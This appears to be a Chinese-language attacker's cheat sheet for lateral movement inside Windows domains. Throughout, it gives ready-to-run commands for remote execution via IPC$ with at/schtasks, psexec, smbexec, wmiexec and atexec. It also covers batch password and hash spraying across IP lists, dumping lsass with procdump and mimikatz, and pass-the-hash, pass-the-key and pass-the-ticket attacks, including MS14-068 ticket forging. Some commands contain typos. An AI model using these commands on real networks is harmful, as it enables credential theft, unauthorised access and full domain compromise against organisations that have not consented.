横向知识总结

at schtasks （IPC连接）

在已知目标系统的用户明文密码(HASH看下一条)的基础上，直接可以在远程主机上执行命令，需要135，445端口开放

at < Windows2012

net use \192.168.3.21\ipc$ “Admin12345” /user:god.org\administrator # 建立 ipc 连接：

copy add.bat \192.168.3.21\c$ #拷贝执行文件到目标机器

mc上线或者net user hyj hyj /add

at \192.168.3.21 15:47 c:\add.bat #添加计划任务

schtasks >=Windows2012

net use \192.168.3.32\ipc$ “密码” /user:god.org\administrator # 建立 ipc 连接：

copy add.bat \192.168.3.32\c$ #复制文件到其 C 盘

schtasks /create /s 192.168.3.32 /ru “SYSTEM” /tn adduser /sc DAILY /tr c:\add.bat /F #创建adduser 任务

对应执行文件

schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务

schtasks /delete /s 192.168.3.21 /tn adduser /f #删除 adduser 任务

net view xx.xx.xx.xx #查看对面共享文件

查看连接 net use

删除连接 net use \192.168.3.21\ipc$ /del

建立 IPC 常见的错误代码

1）5：拒绝访问，可能是使用的用户不是管理员权限，需要先提升权限

2）51：网络问题，Windows 无法找到网络路径（

3）53：找不到网络路径，可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有防火墙等问题

4）67：找不到网络名，本地 Lanmanworkstation 服务未启动，目标删除 ipc$

5）1219：提供的凭据和已存在的凭据集冲突，说明已建立 IPC$，需要先删除

6）1326：账号密码错误

7）1792：目标 NetLogon 服务未启动，连接域控常常会出现此情况

8）2242：用户密码过期，目标有账号策略，强制定期更改密码

#建立 IPC 失败的原因

1）目标系统不是 NT 或以上的操作系统

2）对方没有打开 IPC$共享

3）对方未开启 139、445 端口，或者被防火墙屏蔽

4）输出命令、账号密码有错误

横向渗透明文 HASH 传递 atexec-impacket

atexec.exe ./administrator:Admin12345@192.168.3.21 “whoami”

atexec.exe god/administrator:Admin12345@192.168.3.21 “whoami”

atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami

横向渗透明文 HASH 传递批量利用-综合

批量升级版为文件夹下IPC批量.py 用户收集 net user /domain

FOR /F %%i in (ips.txt) do net use \%%i\ipc$ “admin!@#45” /user:administrator #批量检测IP对应明文连接
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测IP对应明文回显版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@10.0.0.1 whoami #批量检测明文对应IP回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@10.0.0.1 whoami #批量检测HASH对应IP回显版

Procdump+Mimikatz 配合获取密码

受害机运行Procdump

procdump -accepteula -ma lsass.exe lsass.dmp 生成hash.dmp

mimikatz 上执行：

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

#Pwdump7

#QuarksPwdump

SMB 服务利用-psexec,smbexec(官方自带,直接shell)

psexec 第一种：先有 ipc 链接，psexec 需要明文或 hash 传递

net use \192.168.3.32\ipc$ “admin!@#45” /user:administrator

psexec \192.168.3.32 -s cmd # 需要先有 ipc 链接 -s 以 System 权限运行

psexec 第二种：不用建立 IPC 直接提供明文账户密码

psexec \192.168.3.21 -u administrator -p Admin12345 -s cmd

psexec -hashes :$HASH$ ./administrator@10.1.2.3

psexec -hashes :$HASH$ domain/administrator@10.1.2.3

psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 官方 Pstools 无法采用 hash 连接

smbexec 无需先 ipc 链接 明文或 hash 传递

smbexec god/administrator:Admin12345@192.168.3.21

smbexec ./administrator:admin!@#45@192.168.3.32

smbexec -hashes :$HASH$ ./admin@192.168.3.21

smbbexec -hashes :$HASH$ domain/admin@192.168.3.21

smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

WMI 服务利用-cscript,wmiexec,wmicv（）

WMI(Windows Management Instrumentation) 是通过 135 端口进行利用，支持用户名明文或者 hash的方式进行认证，并且该方法不会在目标日志系统留下痕迹。

自带 WMIC 明文传递 无回显

wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create “cmd.exe /c ipconfig >C:\1.txt”

自带 cscript 明文传递 有回显（需要借助wmiexec.vbs）

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

套件 impacket wmiexec 明文或 hash 传递 有回显 exe 版本

wmiexec ./administrator:admin!@#45@192.168.3.32 “whoami”

wmiexec god/administrator:Admin12345@192.168.3.21 “whoami”

wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 “whoami”

wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 “whoami”

PTH、PTT、PTK（ntml、票据、AES keys）

PTH ntlm 传递（mimikatz）

未打补丁下的工作组及域连接：

第一步 mimikatz输入获取hash

privilege::debug

sekurlsa::logonpasswords

第二步 修改hash值

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c

sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

第三步

dir \\192.168.72.1\c$

跟at后续相同

PTT ntlm 传递（mimikatz）

PTK配合mimikatz

mimikatz获取AES加密值

privilege::debug

sekurlsa::ekyes

sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

第二步

dir \\192.168.72.1\c$

跟at后续相同

PTT ntlm 传递（mimikatz）

第一种利用漏洞：

能实现普通用户直接获取域控 system 权限

#MS14-068 powershell 执行

1.查看当前 sid whoami /user

2.mimikatz #

privilege::debug
kerberos::purge

//清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造

mimikatz # kerberos::list

//查看当前机器凭证

mimikatz # kerberos::ptc 票据文件 //将票据注入到内存中

3.利用 ms14-068 生成 TGT 数据

ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码

MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -

p admin!@#45

4.票据注入内存

先清空票据再注入 klist purge //清除所有票据，跟第二步相同。

打开mimikatz.exe 输入"kerberos::ptc TGT_mary@god.org.ccache"

5.查看凭证列表 klist

6.利用

dir \192.168.3.21\c$

第二种利用工具 kekeo

1.生成票据

./kekeo “tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c”

2.导入票据

kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi

3.查看凭证 klist

4.利用 net use 载入

dir \192.168.3.21\c$

第三种利用本地票据(需管理权限)

privilege::debug
sekurlsa::tickets /export 导出票据
kerberos::ptt xxxxxxxxxx.xxxx.kirbi 导入票据
连接

总结：ptt 传递不需本地管理员权限，连接时主机名连接，基于漏洞,工具,本地票据